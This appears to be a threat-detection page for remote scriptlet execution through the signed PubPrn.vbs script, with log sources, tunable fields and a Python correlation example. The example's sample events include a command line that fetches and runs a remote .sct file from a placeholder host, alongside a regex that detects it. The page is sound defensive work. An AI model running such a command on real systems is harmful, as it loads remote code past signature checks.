DET0528 Detecting Remote Script Proxy Execution via PubPrn.vbs

Item | Value
ID | DET0528
Version | 1.0
Created | 21 October 2025
Last Modified | 21 October 2025

Technique Detected: T1216.001 (PubPrn)

Analytics

Windows

AN1464

Execution of PubPrn.vbs via cscript.exe using the ‘script:’ moniker to load and execute a remote .sct scriptlet file, bypassing signature validation and proxying remote payloads through a signed Microsoft script host.

Log Sources
Data Component | Name | Channel
Process Creation (DC0032) | WinEventLog:Sysmon | EventCode=1
Command Execution (DC0064) | WinEventLog:PowerShell | EventCode=4103, 4104, 4105, 4106
Network Connection Creation (DC0082) | WinEventLog:Sysmon | EventCode=3, 22
Module Load (DC0016) | WinEventLog:Sysmon | EventCode=7

Mutable Elements
Field | Description
CommandLineRegex | Detects ‘script:’ moniker with HTTP/HTTPS URI as argument to pubprn.vbs
ParentProcessName | May vary between cscript.exe, wscript.exe, or cmd.exe depending on execution method
NetworkDestinationDomain | Used to detect external domains being contacted for remote scriptlet execution
TimeWindow | Maximum allowed time delta between pubprn.vbs invocation and network connection or child process
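
One way to express the AN1464 correlation, as an added example that is not part of the original page: match the command line on process creation (Sysmon EventCode 1), then look for a network connection or DNS query (EventCode 3 or 22) from the same process inside the time window. The field names follow Sysmon; the regex, the 30-second window, the allowlist, the severity labels and every event below are constructed assumptions.

```python
import re
from datetime import datetime, timedelta

# Tunables named after the page's mutable elements; the values are assumptions.
COMMAND_LINE_REGEX = re.compile(r"pubprn\.vbs\b.*\bscript:\s*https?://", re.I)
TIME_WINDOW = timedelta(seconds=30)
TRUSTED_DOMAINS = {"dc01.corp.example"}  # hypothetical allowlist

PUBPRN = r"C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs"
# Constructed Sysmon-style records (EventCode 1, 3, 22); not real telemetry.
EVENTS = [
    {"EventCode": 1, "UtcTime": "2025-10-21 10:00:00.000", "ProcessGuid": "{A}",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": f"cscript.exe {PUBPRN} localhost script:https://files.example.test/a.sct"},
    {"EventCode": 22, "UtcTime": "2025-10-21 10:00:02.500", "ProcessGuid": "{A}",
     "QueryName": "files.example.test"},
    {"EventCode": 1, "UtcTime": "2025-10-21 11:00:00.000", "ProcessGuid": "{B}",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": f"cscript.exe {PUBPRN} PRINTSRV01 LDAP://CN=Printers,DC=corp,DC=example"},
    {"EventCode": 3, "UtcTime": "2025-10-21 11:00:01.000", "ProcessGuid": "{B}",
     "DestinationHostname": "dc01.corp.example"},
]

def _ts(event):
    return datetime.strptime(event["UtcTime"], "%Y-%m-%d %H:%M:%S.%f")

def detect(events, window=TIME_WINDOW):
    alerts = []
    for proc in (e for e in events if e["EventCode"] == 1):
        if not COMMAND_LINE_REGEX.search(proc["CommandLine"]):
            continue
        # Network (3) or DNS (22) events from the same process inside the window.
        domains = {
            (e.get("QueryName") or e.get("DestinationHostname") or "").lower()
            for e in events
            if e["EventCode"] in (3, 22)
            and e["ProcessGuid"] == proc["ProcessGuid"]
            and timedelta(0) <= _ts(e) - _ts(proc) <= window
        } - TRUSTED_DOMAINS - {""}
        alerts.append({
            "ProcessGuid": proc["ProcessGuid"], "ParentImage": proc["ParentImage"],
            "Domains": sorted(domains),
            # Command line alone is medium; a correlated untrusted lookup raises it.
            "Severity": "high" if domains else "medium",
        })
    return alerts

if __name__ == "__main__":
    print(detect(EVENTS))
```

The second process in the sample uses pubprn.vbs with an LDAP container path and produces no alert, which shows why the rule keys on the `script:` moniker and not on the script name alone.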